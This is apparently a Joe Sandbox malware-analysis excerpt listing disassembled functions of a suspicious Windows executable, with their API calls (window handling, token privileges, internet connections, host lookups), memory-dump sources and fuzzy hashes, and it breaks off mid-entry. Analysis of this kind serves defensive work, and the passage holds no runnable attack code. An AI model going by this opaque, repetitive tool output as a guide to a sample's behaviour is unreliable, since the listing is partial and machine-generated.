                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: abd4f69ddc8af25dc73e2ef5e8dc7007f657f2750940aa19f4291bf012a593e1
                                                      • Instruction ID: 2f64781402f57dab097fd9cc85a446676d5a9a0a6e42bd7739c08591a637f638
                                                      • Opcode Fuzzy Hash: abd4f69ddc8af25dc73e2ef5e8dc7007f657f2750940aa19f4291bf012a593e1
                                                      • Instruction Fuzzy Hash: 6F31C034600246BFDB228F65CC45BFA7BAABF42310F194028F864872A1D731DA90D750
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00664F02
                                                        • Part of subcall function 00643641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0064365B
                                                        • Part of subcall function 00643641: GetCurrentThreadId.KERNEL32 ref: 00643662
                                                        • Part of subcall function 00643641: AttachThreadInput.USER32(00000000,?,00645005), ref: 00643669
                                                      • GetCaretPos.USER32(?), ref: 00664F13
                                                      • ClientToScreen.USER32(00000000,?), ref: 00664F4E
                                                      • GetForegroundWindow.USER32 ref: 00664F54
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: 5f2e964403d637522b7aa1fcaeab671a0e7710b99d72a0701f1765910c9ebc6c
                                                      • Instruction ID: 1189f5d628953e52fcfb9c80762d199e87055cbd7f07a7d748c55de75be1337a
                                                      • Opcode Fuzzy Hash: 5f2e964403d637522b7aa1fcaeab671a0e7710b99d72a0701f1765910c9ebc6c
                                                      • Instruction Fuzzy Hash: 6C313EB1D00109AFCB04EFA6C8859EFBBFDEF98300F10406AE455E7211DA719E058BA1
                                                      APIs
                                                        • Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623
                                                      • GetCursorPos.USER32(?), ref: 0066C4D2
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0061B9AB,?,?,?,?,?), ref: 0066C4E7
                                                      • GetCursorPos.USER32(?), ref: 0066C534
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0061B9AB,?,?,?), ref: 0066C56E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      • Opcode ID: 4ad48e2a40d10897eaa5ffd1ce742de5c39831fe8db8c4a5ecfec2541cc45ee2
                                                      • Instruction ID: fc09b9665e2f470c9cb7c577078e08056f68c254feee42cdd8f12520df474762
                                                      • Opcode Fuzzy Hash: 4ad48e2a40d10897eaa5ffd1ce742de5c39831fe8db8c4a5ecfec2541cc45ee2
                                                      • Instruction Fuzzy Hash: AC31BF35600558AFCB15DF58CC58EFA7BBAEB49320F444069F9468B361CB31AD60DFA4
                                                      APIs
                                                        • Part of subcall function 0063810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00638121
                                                        • Part of subcall function 0063810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0063812B
                                                        • Part of subcall function 0063810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0063813A
                                                        • Part of subcall function 0063810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00638141
                                                        • Part of subcall function 0063810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00638157
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006386A3
                                                      • _memcmp.LIBCMT ref: 006386C6
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006386FC
                                                      • HeapFree.KERNEL32(00000000), ref: 00638703
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 1592001646-0
                                                      • Opcode ID: ebc53f14a2988896cf68c65ccd83e7660d9ac4f62c61f9457a479c76cfdc87fc
                                                      • Instruction ID: 52bdad3c217a80a6d92e9abd6eedd6274229dce0daa803c8e0bff594c0e85c97
                                                      • Opcode Fuzzy Hash: ebc53f14a2988896cf68c65ccd83e7660d9ac4f62c61f9457a479c76cfdc87fc
                                                      • Instruction Fuzzy Hash: C2219D71E40209EFDB10DFA4C95ABEEB7FAEF56304F154099E444AB240DB71AE05CB90
                                                      APIs
                                                      • __setmode.LIBCMT ref: 006009AE
                                                        • Part of subcall function 005E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00647896,?,?,00000000), ref: 005E5A2C
                                                        • Part of subcall function 005E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00647896,?,?,00000000,?,?), ref: 005E5A50
                                                      • _fprintf.LIBCMT ref: 006009E5
                                                      • OutputDebugStringW.KERNEL32(?), ref: 00635DBB
                                                        • Part of subcall function 00604AAA: _flsall.LIBCMT ref: 00604AC3
                                                      • __setmode.LIBCMT ref: 00600A1A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                      • String ID:
                                                      • API String ID: 521402451-0
                                                      • Opcode ID: a04da806f54eab987a22c3228a124104a1393fab8e57c96638792193176297ff
                                                      • Instruction ID: a0e22b35ec806a39dcede1ac623b824c63d53f1ae343e56dcb64de0840301705
                                                      • Opcode Fuzzy Hash: a04da806f54eab987a22c3228a124104a1393fab8e57c96638792193176297ff
                                                      • Instruction Fuzzy Hash: C8112771A882456FD75CB7B59C8A9FF7B6BAF81320F100019F205572D3FE20594297E9
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006517A3
                                                        • Part of subcall function 0065182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0065184C
                                                        • Part of subcall function 0065182D: InternetCloseHandle.WININET(00000000), ref: 006518E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Internet$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 1463438336-0
                                                      • Opcode ID: c9d3a2aa5a2b27473c7e2d138daaadd933de0652bfa8b392ad7a2332bd8f1de7
                                                      • Instruction ID: bc9905adb3412c936db787972874e0311480c1ce95f39498502635170175bd53
                                                      • Opcode Fuzzy Hash: c9d3a2aa5a2b27473c7e2d138daaadd933de0652bfa8b392ad7a2332bd8f1de7
                                                      • Instruction Fuzzy Hash: F8218035200605BBEB269F64DC01FBABBEBFB4A712F10402AFD119A650DB71981597A4
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,0066FAC0), ref: 00643A64
                                                      • GetLastError.KERNEL32 ref: 00643A73
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00643A82
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0066FAC0), ref: 00643ADF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      • API String ID: 2267087916-0
                                                      • Opcode ID: c1f0eb35e38aea886cc07197cdd35ad7d5c63e69810b1ba7944e3a2d698f4e60
                                                      • Instruction ID: 8f743f83943a291c42c2c65039c799283f5f2ba062d61ccd2f4ba088dce725bf
                                                      • Opcode Fuzzy Hash: c1f0eb35e38aea886cc07197cdd35ad7d5c63e69810b1ba7944e3a2d698f4e60
                                                      • Instruction Fuzzy Hash: 7421A3745482159F8300DF28D8858AA7BEAFF59364F105A2DF4D9C73A1D731DE46CB82
                                                      APIs
                                                      • _free.LIBCMT ref: 00615101
                                                        • Part of subcall function 0060571C: __FF_MSGBANNER.LIBCMT ref: 00605733
                                                        • Part of subcall function 0060571C: __NMSG_WRITE.LIBCMT ref: 0060573A
                                                        • Part of subcall function 0060571C: RtlAllocateHeap.NTDLL(00CA0000,00000000,00000001,00000000,?,?,?,00600DD3,?), ref: 0060575F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: 5225c0c4915fd97a3104ccedf8e2ac6916997c779593eec25ce8270a1fb75bb3
                                                      • Instruction ID: 11b74a901ff4bf6bda89d16c9c88bb072eca560563fe4a57ae3a4783f9300c58
                                                      • Opcode Fuzzy Hash: 5225c0c4915fd97a3104ccedf8e2ac6916997c779593eec25ce8270a1fb75bb3
                                                      • Instruction Fuzzy Hash: 1C110172540A11FFCB262F70AC467DF779BAF913A1B14052EF94696390DF348C808688
                                                      APIs
                                                        • Part of subcall function 005E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00647896,?,?,00000000), ref: 005E5A2C
                                                        • Part of subcall function 005E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00647896,?,?,00000000,?,?), ref: 005E5A50
                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00656399
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 006563A4
                                                      • _memmove.LIBCMT ref: 006563D1
                                                      • inet_ntoa.WSOCK32(?), ref: 006563DC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 1504782959-0
                                                      • Opcode ID: 19d38d4d343187d2f81c013cf55d509af82d3eb4ab28ae9ffd4710a4705218d0
                                                      • Instruction ID: 5e8a933f1d46428c8110cdc96332c05d3a175b366327ee18c54f2ebf140f9f2e
                                                      • Opcode Fuzzy Hash: 19d38d4d343187d2f81c013cf55d509af82d3eb4ab28ae9ffd4710a4705218d0
                                                      • Instruction Fuzzy Hash: EE11863150010AAFCB04FFA5DD4ACEE7BBABF54315B544079F505A7161DB309E14CB61
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00638B61
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00638B73
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00638B89
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00638BA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: a9650a32bf6b191a5727e6d0eac76b87fdec9164d89a40a908a3051c5326a21b
                                                      • Instruction ID: d51eccf0317e6c52284dc0b1d4dfe3676954c6744d991c74e6b2eb1bb2c1f173
                                                      • Opcode Fuzzy Hash: a9650a32bf6b191a5727e6d0eac76b87fdec9164d89a40a908a3051c5326a21b
                                                      • Instruction Fuzzy Hash: B2113679900219BFEB11DBA5C884EEDFBB9EB48310F2040A5EA00B7290DA716E11DB94
                                                      APIs
                                                        • Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623
                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 005E12D8
                                                      • GetClientRect.USER32(?,?), ref: 0061B5FB
                                                      • GetCursorPos.USER32(?), ref: 0061B605
                                                      • ScreenToClient.USER32(?,?), ref: 0061B610
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                      • String ID:
                                                      • API String ID: 4127811313-0
                                                      • Opcode ID: f913d925db26e60436355e51bbd5305e2c190cfbeb814dd65493a2e8c879bd3a
                                                      • Instruction ID: 8f499a4c50ce210d22218813b99c1b9a9984e170b042d13cfd3fd0e0f8ef542b
                                                      • Opcode Fuzzy Hash: f913d925db26e60436355e51bbd5305e2c190cfbeb814dd65493a2e8c879bd3a
                                                      • Instruction Fuzzy Hash: 00113A3950045AEFCB04EFAADC899FE7BB9FB45300F400455FA52E7241C770BA518BA9
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0063D84D
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0063D864
                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0063D879
                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0063D897
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                      • String ID:
                                                      • API String ID: 1352324309-0
                                                      • Opcode ID: 4eb45e3624392e58cdd784603dac81b17c1298d2e9477fb9e548740cd1007983
                                                      • Instruction ID: c4c03dea8f7176e4e9c540082ea2ec831595aa2411cb79f18a3c1105d81077ac
                                                      • Opcode Fuzzy Hash: 4eb45e3624392e58cdd784603dac81b17c1298d2e9477fb9e548740cd1007983
                                                      • Instruction Fuzzy Hash: 781139B5A05304EBE3208F51FC48F92BBAAEB00B00F108569EA16D7591D7F0F9499BE1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                      • String ID:
                                                      • API String ID: 3016257755-0
                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                      • Instruction ID: 674b296d9544ad600e0854ec1e0f9f1599ce9bccdc6242cff05bb30f9bf9def1
                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                      • Instruction Fuzzy Hash: 84014E7644824ABFCF165E84CC05CED3F73BB1C395F598415FA1899131D236CAB1AB81
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 0066B2E4
                                                      • ScreenToClient.USER32(?,?), ref: 0066B2FC
                                                      • ScreenToClient.USER32(?,?), ref: 0066B320
                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0066B33B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                      • String ID:
                                                      • API String ID: 357397906-0
                                                      • Opcode ID: 66740dc8be85a3e8eab87a4110a56a15cb6ccf1c15cd26afb5e1e6560e48c724
                                                      • Instruction ID: 7d8651804605e9cc4917021048380c5c97cc0aadd5a8337a808c6c3a94c5db53
                                                      • Opcode Fuzzy Hash: 66740dc8be85a3e8eab87a4110a56a15cb6ccf1c15cd26afb5e1e6560e48c724
                                                      • Instruction Fuzzy Hash: 631143B9D00209EFDB41CFA9D8849EEBBB9FB08310F109166E914E3220D775AA658F50
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00646BE6
                                                        • Part of subcall function 006476C4: _memset.LIBCMT ref: 006476F9
                                                      • _memmove.LIBCMT ref: 00646C09
                                                      • _memset.LIBCMT ref: 00646C16
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00646C26
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                      • String ID:
                                                      • API String ID: 48991266-0
                                                      • Opcode ID: 969ac46c8b93bb91fde8b2c3a68f914f2ba6fc6eb1728492236181fb686966a4
                                                      • Instruction ID: 4a1c2043a5344fb9e5a7bae310d2b895ffcfb890fff11daa1239c428006d505e
                                                      • Opcode Fuzzy Hash: 969ac46c8b93bb91fde8b2c3a68f914f2ba6fc6eb1728492236181fb686966a4
                                                      • Instruction Fuzzy Hash: 99F03A3A200100ABCF456F95EC95A8ABB2AEF45321F048065FE086E266D771A911CBB8
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 005E2231
                                                      • SetTextColor.GDI32(?,000000FF), ref: 005E223B
                                                      • SetBkMode.GDI32(?,00000001), ref: 005E2250
                                                      • GetStockObject.GDI32(00000005), ref: 005E2258
                                                      • GetWindowDC.USER32(?,00000000), ref: 0061BE83
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0061BE90
                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0061BEA9
                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0061BEC2
                                                      • GetPixel.GDI32(00000000,?,?), ref: 0061BEE2
                                                      • ReleaseDC.USER32(?,00000000), ref: 0061BEED
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                      • String ID:
                                                      • API String ID: 1946975507-0
                                                      • Opcode ID: 0bbebc8f48dc398d12287f535f1cebc83e4cf992eb586b3b70e0656f67c87f7c
                                                      • Instruction ID: b4270ed171b010dad4c9ff086bc7c98aa67f3ef3b6039f44798f224335ac305c
                                                      • Opcode Fuzzy Hash: 0bbebc8f48dc398d12287f535f1cebc83e4cf992eb586b3b70e0656f67c87f7c
                                                      • Instruction Fuzzy Hash: 7AE06D32504244EBDF215F64FC0D7D87F12EB16336F049366FA69880E187B24980DB12
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 0063871B
